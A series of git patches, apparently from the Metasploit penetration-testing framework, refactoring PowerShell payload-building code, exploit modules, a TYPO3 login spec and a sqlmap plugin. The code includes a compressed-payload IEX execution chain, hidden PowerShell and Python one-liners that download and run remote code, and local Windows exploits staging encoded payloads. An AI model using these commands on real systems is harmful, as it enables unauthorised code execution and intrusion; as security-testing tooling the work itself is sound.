       # Uncompress and invoke the expression (execute)
-      psh_expression << "IEX (New-Object IO.StreamReader("
-      psh_expression << "New-Object IO.Compression.DeflateStream("
-      psh_expression << "$s,"
-      psh_expression << "[IO.Compression.CompressionMode]::Decompress)"
-      psh_expression << ")).ReadToEnd();"
+      psh_expression << 'IEX (New-Object IO.StreamReader('
+      psh_expression << 'New-Object IO.Compression.DeflateStream('
+      psh_expression << '$s,'
+      psh_expression << '[IO.Compression.CompressionMode]::Decompress)'
+      psh_expression << ')).ReadToEnd();'
 
       # If eof is set, add a marker to signify end of code output
-      #if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
+      # if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
       psh_expression << "echo '#{eof}';" if eof
 
       @code = psh_expression
@@ -99,17 +96,17 @@ module Powershell
 
       # Build the powershell expression
       # Decode base64 encoded command and create a stream object
-      psh_expression =  "$s=New-Object IO.MemoryStream(,"
+      psh_expression =  '$s=New-Object IO.MemoryStream(,'
       psh_expression << "[Convert]::FromBase64String('#{encoded_stream}'));"
       # Uncompress and invoke the expression (execute)
-      psh_expression << "IEX (New-Object IO.StreamReader("
-      psh_expression << "New-Object IO.Compression.GzipStream("
-      psh_expression << "$s,"
-      psh_expression << "[IO.Compression.CompressionMode]::Decompress)"
-      psh_expression << ")).ReadToEnd();"
+      psh_expression << 'IEX (New-Object IO.StreamReader('
+      psh_expression << 'New-Object IO.Compression.GzipStream('
+      psh_expression << '$s,'
+      psh_expression << '[IO.Compression.CompressionMode]::Decompress)'
+      psh_expression << ')).ReadToEnd();'
 
       # If eof is set, add a marker to signify end of code output
-      #if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
+      # if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
       psh_expression << "echo '#{eof}';" if eof
 
       @code = psh_expression
@@ -142,15 +139,13 @@ module Powershell
         begin
           @code = Rex::Text.zlib_inflate(unencoded)
         rescue Zlib::DataError => e
-          raise RuntimeError, "Invalid compression"
+          raise RuntimeError, 'Invalid compression'
         end
       end
 
       @code
     end
   end
-
 end
 end
 end
-
diff --git a/lib/rex/exploitation/powershell/param.rb b/lib/rex/exploitation/powershell/param.rb
index 27815e9e1f..96a4e54480 100644
--- a/lib/rex/exploitation/powershell/param.rb
+++ b/lib/rex/exploitation/powershell/param.rb
@@ -2,14 +2,12 @@
 
 module Rex
 module Exploitation
-
 module Powershell
-
   class Param
     attr_accessor :klass, :name
-    def initialize(klass,name)
+    def initialize(klass, name)
       @klass = klass.strip
-      @name = name.strip.gsub(/\s|,/,'')
+      @name = name.strip.gsub(/\s|,/, '')
     end
 
     #
@@ -20,8 +18,6 @@ module Powershell
       "[#{klass}]$#{name}"
     end
   end
-
 end
 end
 end
-
diff --git a/lib/rex/exploitation/powershell/parser.rb b/lib/rex/exploitation/powershell/parser.rb
index bd679d845e..9304403f47 100644
--- a/lib/rex/exploitation/powershell/parser.rb
+++ b/lib/rex/exploitation/powershell/parser.rb
@@ -1,187 +1,183 @@
 # -*- coding: binary -*-
 
 module Rex
-module Exploitation
+  module Exploitation
+    module Powershell
+      module Parser
+        # Reserved special variables
+        # Acquired with: Get-Variable | Format-Table name, value -auto
+        RESERVED_VARIABLE_NAMES = [
+          '$$',
+          '$?',
+          '$^',
+          '$_',
+          '$args',
+          '$ConfirmPreference',
+          '$ConsoleFileName',
+          '$DebugPreference',
+          '$Env',
+          '$Error',
+          '$ErrorActionPreference',
+          '$ErrorView',
+          '$ExecutionContext',
+          '$false',
+          '$FormatEnumerationLimit',
+          '$HOME',
+          '$Host',
+          '$input',
+          '$LASTEXITCODE',
+          '$MaximumAliasCount',
+          '$MaximumDriveCount',
+          '$MaximumErrorCount',
+          '$MaximumFunctionCount',
+          '$MaximumHistoryCount',
+          '$MaximumVariableCount',
+          '$MyInvocation',
+          '$NestedPromptLevel',
+          '$null',
+          '$OutputEncoding',
+          '$PID',
+          '$PROFILE',
+          '$ProgressPreference',
+          '$PSBoundParameters',
+          '$PSCulture',
+          '$PSEmailServer',
+          '$PSHOME',
+          '$PSSessionApplicationName',
+          '$PSSessionConfigurationName',
+          '$PSSessionOption',
+          '$PSUICulture',
+          '$PSVersionTable',
+          '$PWD',
+          '$ReportErrorShowExceptionClass',
+          '$ReportErrorShowInnerException',
+          '$ReportErrorShowSource',
+          '$ReportErrorShowStackTrace',
+          '$ShellId',
+          '$StackTrace',
+          '$true',
+          '$VerbosePreference',
+          '$WarningPreference',
+          '$WhatIfPreference'
+        ].map(&:downcase).freeze
 
-module Powershell
-
-  module Parser
-    # Reserved special variables
-    # Acquired with: Get-Variable | Format-Table name, value -auto
-    RESERVED_VARIABLE_NAMES = [
-        '$$',
-        '$?',
-        '$^',
-        '$_',
-        '$args',
-        '$ConfirmPreference',
-        '$ConsoleFileName',
-        '$DebugPreference',
-        '$Env',
-        '$Error',
-        '$ErrorActionPreference',
-        '$ErrorView',
-        '$ExecutionContext',
-        '$false',
-        '$FormatEnumerationLimit',
-        '$HOME',
-        '$Host',
-        '$input',
-        '$LASTEXITCODE',
-        '$MaximumAliasCount',
-        '$MaximumDriveCount',
-        '$MaximumErrorCount',
-        '$MaximumFunctionCount',
-        '$MaximumHistoryCount',
-        '$MaximumVariableCount',
-        '$MyInvocation',
-        '$NestedPromptLevel',
-        '$null',
-        '$OutputEncoding',
-        '$PID',
-        '$PROFILE',
-        '$ProgressPreference',
-        '$PSBoundParameters',
-        '$PSCulture',
-        '$PSEmailServer',
-        '$PSHOME',
-        '$PSSessionApplicationName',
-        '$PSSessionConfigurationName',
-        '$PSSessionOption',
-        '$PSUICulture',
-        '$PSVersionTable',
-        '$PWD',
-        '$ReportErrorShowExceptionClass',
-        '$ReportErrorShowInnerException',
-        '$ReportErrorShowSource',
-        '$ReportErrorShowStackTrace',
-        '$ShellId',
-        '$StackTrace',
-        '$true',
-        '$VerbosePreference',
-        '$WarningPreference',
-        '$WhatIfPreference'
-      ].map(&:downcase).freeze
-
-    #
-    # Get variable names from code, removes reserved names from return
-    #
-    # @return [Array] variable names
-    def get_var_names
-      our_vars = code.scan(/\$[a-zA-Z\-\_0-9]+/).uniq.flatten.map(&:strip)
-      our_vars.select {|v| !RESERVED_VARIABLE_NAMES.include?(v.downcase)}
-    end
-
-    #
-    # Get function names from code
-    #
-    # @return [Array] function names
-    def get_func_names
-      code.scan(/function\s([a-zA-Z\-\_0-9]+)/).uniq.flatten
-    end
-
-    #
-    # Attempt to find string literals in PSH expression
-    #
-    # @return [Array] string literals
-    def get_string_literals
-      code.scan(/@"(.+?)"@|@'(.+?)'@/m)
-    end
-
-    #
-    # Scan code and return matches with index
-    #
-    # @param str [String] string to match in code
-    # @param source [String] source code to match, defaults to @code
-    #
-    # @return [Array[String,Integer]] matched items with index
-    def scan_with_index(str,source=code)
-      ::Enumerator.new do |y|
-        source.scan(str) do
-          y << ::Regexp.last_match
+        #
+        # Get variable names from code, removes reserved names from return
+        #
+        # @return [Array] variable names
+        def get_var_names
+          our_vars = code.scan(/\$[a-zA-Z\-\_0-9]+/).uniq.flatten.map(&:strip)
+          our_vars.select { |v| !RESERVED_VARIABLE_NAMES.include?(v.downcase) }
         end
-      end.map{|m| [m.to_s,m.offset(0)[0]]}
+
+        #
+        # Get function names from code
+        #
+        # @return [Array] function names
+        def get_func_names
+          code.scan(/function\s([a-zA-Z\-\_0-9]+)/).uniq.flatten
+        end
+
+        #
+        # Attempt to find string literals in PSH expression
+        #
+        # @return [Array] string literals
+        def get_string_literals
+          code.scan(/@"(.+?)"@|@'(.+?)'@/m)
+        end
+
+        #
+        # Scan code and return matches with index
+        #
+        # @param str [String] string to match in code
+        # @param source [String] source code to match, defaults to @code
+        #
+        # @return [Array[String,Integer]] matched items with index
+        def scan_with_index(str, source = code)
+          ::Enumerator.new do |y|
+            source.scan(str) do
+              y << ::Regexp.last_match
+            end
+          end.map { |m| [m.to_s, m.offset(0)[0]] }
+        end
+
+        #
+        # Return matching bracket type
+        #
+        # @param char [String] opening bracket character
+        #
+        # @return [String] matching closing bracket
+        def match_start(char)
+          case char
+          when '{'
+            '}'
+          when '('
+            ')'
+          when '['
+            ']'
+          when '<'
+            '>'
+          else
+            fail ArgumentError, 'Unknown starting bracket'
+          end
+        end
+
+        #
+        # Extract block of code inside brackets/parenthesis
+        #
+        # Attempts to match the bracket at idx, handling nesting manually
+        # Once the balanced matching bracket is found, all script content
+        # between idx and the index of the matching bracket is returned
+        #
+        # @param idx [Integer] index of opening bracket
+        #
+        # @return [String] content between matching brackets
+        def block_extract(idx)
+          fail ArgumentError unless idx
+
+          if idx < 0 || idx >= code.length
+            fail ArgumentError, 'Invalid index'
+          end
+
+          start = code[idx]
+          stop = match_start(start)
+          delims = scan_with_index(/#{Regexp.escape(start)}|#{Regexp.escape(stop)}/, code[idx + 1..-1])
+          delims.map { |x| x[1] = x[1] + idx + 1 }
+          c = 1
+          sidx = nil
+          # Go through delims till we balance, get idx
+          while (c != 0) && (x = delims.shift)
+            sidx = x[1]
+            x[0] == stop ? c -= 1 : c += 1
+          end
+
+          code[idx..sidx]
+        end
+
+        #
+        # Extract a block of function code
+        #
+        # @param func_name [String] function name
+        # @param delete [Boolean] delete the function from the code
+        #
+        # @return [String] function block
+        def get_func(func_name, delete = false)
+          start = code.index(func_name)
+
+          return nil unless start
+
+          idx = code[start..-1].index('{') + start
+          func_txt = block_extract(idx)
+
+          if delete
+            delete_code = code[0..idx]
+            delete_code << code[(idx + func_txt.length)..-1]
+            @code = delete_code
+          end
+
+          Function.new(func_name, func_txt)
+        end
+      end # Parser
     end
-
-    #
-    # Return matching bracket type
-    #
-    # @param char [String] opening bracket character
-    #
-    # @return [String] matching closing bracket
-    def match_start(char)
-      case char
-      when '{'
-        '}'
-      when '('
-        ')'
-      when '['
-        ']'
-      when '<'
-        '>'
-      else
-        raise ArgumentError, "Unknown starting bracket"
-      end
-    end
-
-    #
-    # Extract block of code inside brackets/parenthesis
-    #
-    # Attempts to match the bracket at idx, handling nesting manually
-    # Once the balanced matching bracket is found, all script content
-    # between idx and the index of the matching bracket is returned
-    #
-    # @param idx [Integer] index of opening bracket
-    #
-    # @return [String] content between matching brackets
-    def block_extract(idx)
-      raise ArgumentError unless idx
-
-      if idx < 0 || idx >= code.length
-          raise ArgumentError, "Invalid index"
-      end
-
-      start = code[idx]
-      stop = match_start(start)
-      delims = scan_with_index(/#{Regexp.escape(start)}|#{Regexp.escape(stop)}/,code[idx+1..-1])
-      delims.map {|x| x[1] = x[1] + idx + 1}
-      c = 1
-      sidx = nil
-      # Go through delims till we balance, get idx
-      while ((c != 0) && (x = delims.shift)) do
-        sidx = x[1]
-        x[0] == stop ? c -=1 : c+=1
-      end
-
-      code[idx..sidx]
-    end
-
-    #
-    # Extract a block of function code
-    #
-    # @param func_name [String] function name
-    # @param delete [Boolean] delete the function from the code
-    #
-    # @return [String] function block
-    def get_func(func_name, delete = false)
-      start = code.index(func_name)
-
-      return nil unless start
-
-      idx = code[start..-1].index('{') + start
-      func_txt = block_extract(idx)
-
-      if delete
-        delete_code = code[0..idx]
-        delete_code << code[(idx+func_txt.length)..-1]
-        @code = delete_code
-      end
-
-      Function.new(func_name,func_txt)
-    end
-  end # Parser
-
+  end
 end
-end
-end
-
diff --git a/lib/rex/exploitation/powershell/psh_methods.rb b/lib/rex/exploitation/powershell/psh_methods.rb
index d85a739846..d53fde9d48 100644
--- a/lib/rex/exploitation/powershell/psh_methods.rb
+++ b/lib/rex/exploitation/powershell/psh_methods.rb
@@ -2,15 +2,12 @@
 
 module Rex
 module Exploitation
-
 module Powershell
-
   ##
   # Convenience methods for generating powershell code in Ruby
   ##
 
   module PshMethods
-
     #
     # Download file via .NET WebClient
     #
@@ -20,7 +17,7 @@ module Powershell
     # @return [String] Powershell code to download a file
     def self.download(src, target)
       target ||= '$pwd\\' << src.split('/').last
-      return %Q^(new-object System.Net.WebClient).DownloadFile("#{src}", "#{target}")^
+      %Q^(new-object System.Net.WebClient).DownloadFile("#{src}", "#{target}")^
     end
 
     #
@@ -31,9 +28,9 @@ module Powershell
     #   the application name
     #
     # @return [String] Powershell code to uninstall an application
-    def self.uninstall(app,fuzzy=true)
+    def self.uninstall(app, fuzzy = true)
       match = fuzzy ? '-like' : '-eq'
-      return %Q^$app = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name #{match} "#{app}" }; $app.Uninstall()^
+      %Q^$app = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name #{match} "#{app}" }; $app.Uninstall()^
     end
 
     #
@@ -43,7 +40,7 @@ module Powershell
     #
     # @return [String] Powershell code to create a SecureString
     def self.secure_string(str)
-      return %Q^ConvertTo-SecureString -string '#{str}' -AsPlainText -Force$^
+      %Q(ConvertTo-SecureString -string '#{str}' -AsPlainText -Force$)
     end
 
     #
@@ -54,7 +51,7 @@ module Powershell
     # @return [String] Powershell code to identify the PID of a file
     #   lock owner
     def self.who_locked_file(filename)
-      return %Q^ Get-Process | foreach{$processVar = $_;$_.Modules | foreach{if($_.FileName -eq "#{filename}"){$processVar.Name + " PID:" + $processVar.id}}}^
+      %Q^ Get-Process | foreach{$processVar = $_;$_.Modules | foreach{if($_.FileName -eq "#{filename}"){$processVar.Name + " PID:" + $processVar.id}}}^
     end
 
     #
@@ -65,11 +62,9 @@ module Powershell
     # @return [String] Powershell code to return the last time of a user
     #   login
     def self.get_last_login(user)
-      return %Q^ Get-QADComputer -ComputerRole DomainController | foreach { (Get-QADUser -Service $_.Name -SamAccountName "#{user}").LastLogon} | Measure-Latest^
+      %Q^ Get-QADComputer -ComputerRole DomainController | foreach { (Get-QADUser -Service $_.Name -SamAccountName "#{user}").LastLogon} | Measure-Latest^
     end
   end
-
 end
 end
 end
-
diff --git a/lib/rex/exploitation/powershell/script.rb b/lib/rex/exploitation/powershell/script.rb
index 3b3643dfd4..0892b6b676 100644
--- a/lib/rex/exploitation/powershell/script.rb
+++ b/lib/rex/exploitation/powershell/script.rb
@@ -4,9 +4,7 @@ require 'rex'
 
 module Rex
 module Exploitation
-
 module Powershell
-
   class Script
     attr_accessor :code
     attr_reader :functions, :rig
@@ -17,9 +15,9 @@ module Powershell
     # Pretend we are actually a string
     extend Forwardable
     # In case someone messes with String we delegate based on its instance methods
-    #eval %Q|def_delegators :@code, :#{::String.instance_methods[0..(String.instance_methods.index(:class)-1)].join(', :')}|
+    # eval %Q|def_delegators :@code, :#{::String.instance_methods[0..(String.instance_methods.index(:class)-1)].join(', :')}|
     def_delegators :@code, :each_line, :strip, :chars, :intern, :chr, :casecmp, :ascii_only?, :<, :tr_s,
-                   :!=, :capitalize!, :ljust, :to_r, :sum, :private_methods, :gsub,:dump, :match, :to_sym,
+                   :!=, :capitalize!, :ljust, :to_r, :sum, :private_methods, :gsub, :dump, :match, :to_sym,
                    :enum_for, :display, :tr_s!, :freeze, :gsub, :split, :rindex, :<<, :<=>, :+, :lstrip!,
                    :encoding, :start_with?, :swapcase, :lstrip!, :encoding, :start_with?, :swapcase,
                    :each_byte, :lstrip, :codepoints, :insert, :getbyte, :swapcase!, :delete, :rjust, :>=,
@@ -29,13 +27,13 @@ module Powershell
                    :<=, :to_c, :slice!, :chomp!, :next!, :downcase, :unpack, :crypt, :partition,
                    :between?, :squeeze!, :to_s, :chomp, :bytes, :clear, :!~, :to_i, :valid_encoding?, :===,
                    :tr, :downcase!, :scan, :sub!, :each_codepoint, :reverse!, :class, :size, :empty?, :byteslice,
-                   :initialize_clone, :to_str, :to_enum,:tap, :tr!, :trust, :encode!, :sub, :oct, :succ, :index,
+                   :initialize_clone, :to_str, :to_enum, :tap, :tr!, :trust, :encode!, :sub, :oct, :succ, :index,
                    :[]=, :encode, :*, :hex, :to_f, :strip!, :rpartition, :ord, :capitalize, :upto, :force_encoding,
                    :end_with?
 
     def initialize(code)
       @code = ''
-      @rig = Rex::RandomIdentifierGenerator.new()
+      @rig = Rex::RandomIdentifierGenerator.new
 
       begin
         # Open code file for reading
@@ -50,10 +48,9 @@ module Powershell
         # Treat code as a... code
         @code = code.to_s.dup # in case we're eating another script
       end
-      @functions = get_func_names.map {|f| get_func(f)}
+      @functions = get_func_names.map { |f| get_func(f) }
     end
 
-
     ##
     # Class methods
     ##
@@ -66,7 +63,7 @@ module Powershell
     # @param var_name [String] Byte array variable name
     #
     # @return [String] input_data as a powershell byte array
-    def self.to_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
+    def self.to_byte_array(input_data, var_name = Rex::Text.rand_text_alpha(rand(3) + 3))
       # File will raise an exception if the path contains null byte
       if input_data.include? "\x00"
         code = input_data
@@ -77,15 +74,15 @@ module Powershell
       code = code.unpack('C*')
       psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
       lines = []
-      1.upto(code.length-1) do |byte|
-        if(byte % 10 == 0)
+      1.upto(code.length - 1) do |byte|
+        if (byte % 10 == 0)
           lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
         else
           lines.push ",0x#{code[byte].to_s(16)}"
         end
       end
 
-      return psh << lines.join("") + "\r\n"
+      psh << lines.join('') + "\r\n"
     end
 
     #
@@ -93,11 +90,9 @@ module Powershell
     #
     # @return [Array] Code modifiers
     def self.code_modifiers
-      self.instance_methods.select {|m| m =~ /^(strip|sub)/}
+      instance_methods.select { |m| m =~ /^(strip|sub)/ }
     end
   end # class Script
-
 end
 end
 end
-

From b0a596b4a1f6e01efc8e94000c701caf8c74b17f Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 20 Jul 2014 21:59:10 +0100
Subject: [PATCH 135/321] Update newer modules

---
 modules/exploits/multi/script/web_delivery.rb            | 6 +++++-
 .../windows/local/ms13_097_ie_registry_symlink.rb        | 9 ++++++++-
 modules/exploits/windows/local/ms14_009_ie_dfsvc.rb      | 9 ++++++++-
 3 files changed, 21 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb
index 5a94b56a6e..7f8f731d91 100644
--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -87,7 +87,11 @@ class Metasploit3 < Msf::Exploit::Remote
       print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
     when "PSH_x86", "PSH_x64"
       download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
-      print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"")
+      print_line generate_psh_command_line({
+                                     :noprofile => true,
+                                     :windowstyle => 'hidden',
+                                     :command => download_and_run
+                                 })
     end
   end
 end
diff --git a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb
index 1cf3a6204c..d97db170ce 100644
--- a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb
+++ b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb
@@ -79,7 +79,14 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def primer
-    cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
+    cmd = cmd_psh_payload(payload.encoded,
+                          payload_instance.arch.first,
+                          {
+                            :remove_comspec => true
+                          }
+                         )
+
+    cmd.gsub!('powershell.exe ','')
     session.railgun.kernel32.SetEnvironmentVariableA("PSH_CMD", cmd)
 
     html_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.html"
diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb
index 89b2bf9e32..4fc5101b59 100644
--- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb
+++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb
@@ -148,7 +148,14 @@ class Metasploit3 < Msf::Exploit::Local
 
     print_good(".NET looks vulnerable, exploiting...")
 
-    cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
+    cmd = cmd_psh_payload(payload.encoded,
+                          payload_instance.arch.first,
+                          {
+                            :remove_comspec => true
+                          }
+                         )
+
+    cmd.gsub!('powershell.exe ','')
     session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd)
 
     temp = get_env('TEMP')

From 47d9a30af0fd591e6699b28cbe648048ca391cb3 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 21 Jul 2014 17:39:07 -0500
Subject: [PATCH 136/321] Add specs for Typo3 mixin

---
 lib/msf/http/typo3/login.rb | 16 ++++++++++++++--
 1 file changed, 14 insertions(+), 2 deletions(-)

diff --git a/lib/msf/http/typo3/login.rb b/lib/msf/http/typo3/login.rb
index c255942863..d34a91d440 100644
--- a/lib/msf/http/typo3/login.rb
+++ b/lib/msf/http/typo3/login.rb
@@ -18,8 +18,20 @@ module Msf::HTTP::Typo3::Login
       return nil
     end
 
-    e = res_main.body.match(/<input type="hidden" id="rsa_e" name="e" value="(\d+)" \/>/)[1]
-    n = res_main.body.match(/<input type="hidden" id="rsa_n" name="n" value="(\w+)" \/>/)[1]
+    e_match = res_main.body.match(/<input type="hidden" id="rsa_e" name="e" value="(\d+)" \/>/)
+    if e_match.nil?
+      vprint_error('Can not find rsa_e value')
+      return nil
+    end
+    e = e_match[1]
+
+    n_match = res_main.body.match(/<input type="hidden" id="rsa_n" name="n" value="(\w+)" \/>/)
+    if n_match.nil?
+      vprint_error('Can not find rsa_n value')
+      return nil
+    end
+    n = n_match[1]
+
     vprint_debug("e: #{e}")
     vprint_debug("n: #{n}")
     rsa_enc = typo3_helper_login_rsa(e, n, pass)

From 72c2c07495249b611ce9774e66f789e88adcb4cb Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 21 Jul 2014 17:39:51 -0500
Subject: [PATCH 137/321] Add the specs, really

---
 spec/lib/msf/http/typo3.rb | 139 +++++++++++++++++++++++++++++++++++++
 1 file changed, 139 insertions(+)
 create mode 100644 spec/lib/msf/http/typo3.rb

diff --git a/spec/lib/msf/http/typo3.rb b/spec/lib/msf/http/typo3.rb
new file mode 100644
index 0000000000..329302b4f4
--- /dev/null
+++ b/spec/lib/msf/http/typo3.rb
@@ -0,0 +1,139 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'msf/core'
+require 'rex/proto/http/response'
+require 'msf/http/typo3'
+
+describe Msf::HTTP::Typo3 do
+  subject do
+    mod = ::Msf::Module.new
+    mod.extend described_class
+    mod
+  end
+
+  let(:invalid_user) do
+    "invalid"
+  end
+
+  let(:invalid_password) do
+    "invalid"
+  end
+
+  let(:valid_user) do
+    "admin"
+  end
+
+  let(:valid_password) do
+    "password"
+  end
+
+  let(:valid_cookie) do
+    "be_typo_user=e31843639e5e17b9600602f9378b6ff0"
+  end
+
+  describe '#target_uri' do
+    it 'returns an URI' do
+      expect(subject.target_uri).to be_kind_of URI
+    end
+  end
+
+  describe '#typo3_url_login' do
+    it 'ends with /typo3/index.php' do
+      expect(subject.typo3_url_login).to end_with('/typo3/index.php')
+    end
+  end
+
+  describe '#typo3_url_backend' do
+    it 'ends with /typo3/backend.php' do
+      expect(subject.typo3_url_backend).to end_with('/typo3/backend.php')
+    end
+  end
+
+  describe '#typo3_admin_cookie_valid?' do
+    it 'returns true when valid admin cookie' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.body = '<body class="test" id="typo3-backend-php">'
+        res
+      end
+
+      expect(subject.typo3_admin_cookie_valid?("#{valid_cookie};")).to eq(true)
+    end
+
+    it 'returns false when invalid admin cookie' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res
+      end
+
+      expect(subject.typo3_admin_cookie_valid?("invalid")).to eq(false)
+    end
+  end
+
+  describe '#typo3_backend_login' do
+
+    it 'returns nil login page can not be reached' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response::E404.new
+        res
+      end
+
+      expect(subject.typo3_backend_login(valid_user, valid_password)).to be_nil
+    end
+
+    it 'returns nil when login page can be reached but isn\'t a TYPO3' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new
+        res.body = 'Hello World'
+        res
+      end
+
+      expect(subject.typo3_backend_login(valid_user, valid_password)).to be_nil
+    end
+
+    it 'returns nil when TYPO3 credentials are invalid' do
+
+      allow(subject).to receive(:send_request_cgi) do |opts|
+        if opts['uri'] == "/typo3/index.php" && opts['method'] == 'GET'
+          res = Rex::Proto::Http::Response.new
+          res.body = '<input type="hidden" id="rsa_e" name="e" value="10001" />'
+          res.body << '<input type="hidden" id="rsa_n" name="n" value="B8C58D75B5F9DBCEBBF6FB96BDB9531C64C45DDED56D93B310FA9C79B9787E62C91157DD5842B2BC1D90C10251300571BEEF892776F25EAC80C2672A993B00DA2F1C966C3F70418274E1AC9C432F48F8CBD9D083F990905F7EC5BDFC1B5C93672E7ACBB3D935D0597864A1F732DD44B5C6E02344917543E33A36D68915B26DC9" />'
+        elsif opts['uri'] == "/typo3/index.php" && opts['method'] == 'POST'
+          res = Rex::Proto::Http::Response.new
+          res.body = '<!-- ###LOGIN_ERROR### begin -->Login Failed<!-- ###LOGIN_ERROR### end -->'
+        else
+          res = Rex::Proto::Http::Response::E404.new
+        end
+
+        res
+      end
+
+      expect(subject.typo3_backend_login(invalid_user, invalid_password)).to be_nil
+    end
+
+    it 'returns a cookie string when TYPO3 credentials are valid' do
+      allow(subject).to receive(:send_request_cgi) do |opts|
+        if opts['uri'] == "/typo3/index.php" && opts['method'] == 'GET'
+          res = Rex::Proto::Http::Response.new
+          res.body = '<input type="hidden" id="rsa_e" name="e" value="10001" />'
+          res.body << '<input type="hidden" id="rsa_n" name="n" value="B8C58D75B5F9DBCEBBF6FB96BDB9531C64C45DDED56D93B310FA9C79B9787E62C91157DD5842B2BC1D90C10251300571BEEF892776F25EAC80C2672A993B00DA2F1C966C3F70418274E1AC9C432F48F8CBD9D083F990905F7EC5BDFC1B5C93672E7ACBB3D935D0597864A1F732DD44B5C6E02344917543E33A36D68915B26DC9" />'
+        elsif opts['uri'] == "/typo3/index.php" && opts['method'] == 'POST'
+          res = Rex::Proto::Http::Response.new
+          res.headers['Set-Cookie'] = "#{valid_cookie};"
+        elsif opts['uri'] == "/typo3/backend.php" && opts['method'] == 'GET'
+          res = Rex::Proto::Http::Response.new
+          res.body = '<body class="test" id="typo3-backend-php">'
+          res
+        else
+          res = Rex::Proto::Http::Response::E404.new
+        end
+
+        res
+      end
+
+      expect(subject.typo3_backend_login(valid_user, valid_password)).to include(valid_cookie)
+    end
+  end
+
+end

From 5190ed750f47caa909287aeef1624fd84c84d1f6 Mon Sep 17 00:00:00 2001
From: Brandon Perry <bperry.volatile@gmail.com>
Date: Mon, 21 Jul 2014 17:49:53 -0500
Subject: [PATCH 138/321] This adds the human readable IDs

and converts the negative if's into unless.
---
 plugins/sqlmap.rb | 93 ++++++++++++++++++++++++++---------------------
 1 file changed, 52 insertions(+), 41 deletions(-)

diff --git a/plugins/sqlmap.rb b/plugins/sqlmap.rb
index 7cc3ab767f..c5985a5432 100644
--- a/plugins/sqlmap.rb
+++ b/plugins/sqlmap.rb
@@ -45,13 +45,13 @@ module Msf
       end
 
       def cmd_sqlmap_set_option(*args)
-        if args.length != 3
+        unless args.length == 3
           print_error("Usage:")
           print_error("\tsqlmap_set_option <taskid> <option_name> <option_value>")
           return
         end
 
-        if !@manager
+        unless @manager
           print_error("Please run sqlmap_connect <host> first.")
           return
         end
@@ -61,7 +61,7 @@ module Msf
           val = val.to_i
         end
 
-        res = @manager.set_option(args[0], args[1], val)
+        res = @manager.set_option(@hid_tasks[args[0]], args[1], val)
         print_status("Success: " + res["success"].to_s)
       end
 
@@ -78,33 +78,33 @@ module Msf
           options['url'] = args[1]
         end
 
-        if !options['url'] && @tasks[args[0]]['url'] == ''
+        if !options['url'] && @tasks[@hid_tasks[args[0]]]['url'] == ''
           print_error("You need to specify a URL either as an argument to sqlmap_start_task or sqlmap_set_option")
           return
         end
 
-        if !@manager
+        unless @manager
           print_error("Please run sqlmap_connect <host> first.")
           return
         end
 
-        res = @manager.start_task(args[0], options)
+        res = @manager.start_task(@hid_tasks[args[0]], options)
         print_status("Started task: " + res["success"].to_s)
       end
 
       def cmd_sqlmap_get_log(*args)
-        if args.length != 1
+        unless args.length == 1
           print_error("Usage:")
           print_error("\tsqlmap_get_log <taskid>")
           return
         end
 
-        if !@manager
+        unless @manager
           print_error("Please run sqlmap_connect <host> first.")
           return
         end
 
-        res = @manager.get_task_log(args[0])
+        res = @manager.get_task_log(@hid_tasks[args[0]])
 
         res["log"].each do |message|
           print_status("[#{message["time"]}] #{message["level"]}: #{message["message"]}")
@@ -112,43 +112,43 @@ module Msf
       end
 
       def cmd_sqlmap_get_status(*args)
-        if args.length != 1
+        unless args.length == 1
           print_error("Usage:")
           print_error("\tsqlmap_get_status <taskid>")
           return
         end
 
-        if !@manager
+        unless @manager
           print_error("Please run sqlmap_connect <host> first.")
           return
         end
 
-        res = @manager.get_task_status(args[0])
+        res = @manager.get_task_status(@hid_tasks[args[0]])
 
         print_status("Status: " + res['status'])
-
       end
 
       def cmd_sqlmap_get_data(*args)
-        if args.length != 1
+        unless args.length == 1
           print_error("Usage:")
           print_error("\tsqlmap_get_data <taskid>")
           return
         end
 
-        @tasks = {} if !@tasks
+        @hid_tasks ||= {}
+        @tasks ||= {}
 
-        if !@manager
+        unless @manager
           print_error("Please run sqlmap_connect <host> first.")
           return
         end
 
